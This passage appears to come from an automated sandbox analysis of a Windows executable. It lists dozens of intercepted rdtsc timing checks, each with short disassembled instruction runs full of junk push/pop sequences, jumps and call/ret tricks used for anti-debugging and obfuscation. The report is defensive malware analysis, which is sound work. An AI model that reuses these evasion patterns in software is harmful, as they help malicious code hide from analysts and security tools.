              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF836 second address: CCF84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18343h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF84F second address: CCF87C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D64E66h 0x00000008 jg 00007FA1D8D64E56h 0x0000000e jno 00007FA1D8D64E56h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF87C second address: CCF882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF99B second address: CCF9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA1D8D64E56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF9A5 second address: CCF9AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF9AB second address: CCF9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007FA1D8D64E56h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF9BF second address: CCF9D1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1D8D18336h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF9D1 second address: CCF9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF9E2 second address: CCF9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF9E6 second address: CCFA05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1D8D64E69h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCFA05 second address: CCFA13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1D8D18338h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0004 second address: CD0014 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1D8D64E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0014 second address: CD0029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Bh 0x00000007 jnp 00007FA1D8D18336h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0029 second address: CD0035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FA1D8D64E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0035 second address: CD0039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2850 second address: CD2856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD40B1 second address: CD40B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD42BD second address: CD42CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FA1D8D64E56h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C90F98 second address: C90FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA1D8D18336h 0x0000000a popad 0x0000000b jmp 00007FA1D8D1833Bh 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 jmp 00007FA1D8D18341h 0x00000018 js 00007FA1D8D18336h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA413 second address: CDA417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA417 second address: CDA43C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FA1D8D1833Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA43C second address: CDA442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA442 second address: CDA44C instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1D8D1833Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA44C second address: CDA454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA454 second address: CDA458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA6DF second address: CDA6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA6E3 second address: CDA6E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA6E9 second address: CDA701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D64E5Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA701 second address: CDA707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA707 second address: CDA70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDAB02 second address: CDAB08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDAB08 second address: CDAB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDAC4D second address: CDAC5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA1D8D18336h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDAC5D second address: CDAC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b push ebx 0x0000000c jl 00007FA1D8D64E5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDBEDC second address: CDBEE6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDBEE6 second address: CDBF0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FA1D8D64E5Eh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jg 00007FA1D8D64E56h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDBF0D second address: CDBF2F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA1D8D18344h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDBF2F second address: CDBF3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC558 second address: CDC572 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1D8D1833Fh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC572 second address: CDC577 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCB91 second address: CDCBE4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FA1D8D18338h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 nop 0x00000027 jno 00007FA1D8D18354h 0x0000002d push eax 0x0000002e pushad 0x0000002f push ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC8A second address: CDCC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD0CA second address: CDD0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD0CE second address: CDD0E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD6B3 second address: CDD6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007FA1D8D1833Ch 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD6CA second address: CDD705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, 11DC41E1h 0x00000010 jmp 00007FA1D8D64E65h 0x00000015 push 00000000h 0x00000017 mov esi, 099D2CC4h 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D1B67h] 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD705 second address: CDD70A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE061 second address: CDE075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFB1A second address: CDFB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0809 second address: CE081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007FA1D8D64E56h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE081D second address: CE0822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0822 second address: CE0827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0827 second address: CE0886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA1D8D18336h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FA1D8D18338h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 add edi, 6AE29C3Dh 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D27C2h], edx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FA1D8D18338h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0886 second address: CE088C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE088C second address: CE0892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0892 second address: CE0896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0896 second address: CE08A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1D5B second address: CE1DC4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1D8D64E5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007FA1D8D64E5Eh 0x00000011 nop 0x00000012 push edi 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FA1D8D64E58h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D3102h], eax 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA1D8D64E64h 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE287B second address: CE287F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE287F second address: CE289E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1D8D64E67h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE289E second address: CE28A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE449C second address: CE44C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E5Dh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1D8D64E66h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE44C6 second address: CE44CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE44CC second address: CE44D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F42 second address: CE6F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F4C second address: CE6F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F50 second address: CE6F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FA1D8D1833Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F63 second address: CE6F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F67 second address: CE6F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6F6C second address: CE6F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9E30 second address: CE9E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA1D8D18336h 0x0000000a jmp 00007FA1D8D18343h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E557 second address: C9E561 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1D8D64E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA417 second address: CEA41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA41B second address: CEA41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10BB second address: CE10C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC4B0 second address: CEC4B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE5AD second address: CEE5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE5B1 second address: CEE5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE5B5 second address: CEE5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF492 second address: CEF511 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1D8D64E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA1D8D64E5Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007FA1D8D64E61h 0x00000017 pop ebx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FA1D8D64E58h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FA1D8D64E58h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 mov edi, eax 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 jbe 00007FA1D8D64E56h 0x0000005d pop eax 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF511 second address: CEF538 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1D8D18338h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA1D8D18348h 0x00000013 jmp 00007FA1D8D18342h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25CA second address: CE25F1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1D8D64E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FA1D8D64E68h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25F1 second address: CE260C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18347h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF06B6 second address: CF06BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF06BB second address: CF06C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0745 second address: CF0750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2643 second address: CF2649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2649 second address: CF264E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF364B second address: CF36B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push esi 0x00000008 call 00007FA1D8D18338h 0x0000000d pop esi 0x0000000e mov dword ptr [esp+04h], esi 0x00000012 add dword ptr [esp+04h], 0000001Dh 0x0000001a inc esi 0x0000001b push esi 0x0000001c ret 0x0000001d pop esi 0x0000001e ret 0x0000001f xor dword ptr [ebp+122D5650h], eax 0x00000025 mov ebx, 0C18A92Eh 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D1C59h], eax 0x00000032 mov dword ptr [ebp+122D191Dh], ebx 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b jo 00007FA1D8D1833Ch 0x00000041 mov edi, dword ptr [ebp+122D196Dh] 0x00000047 pop edi 0x00000048 xchg eax, esi 0x00000049 jmp 00007FA1D8D18341h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 rdtsc
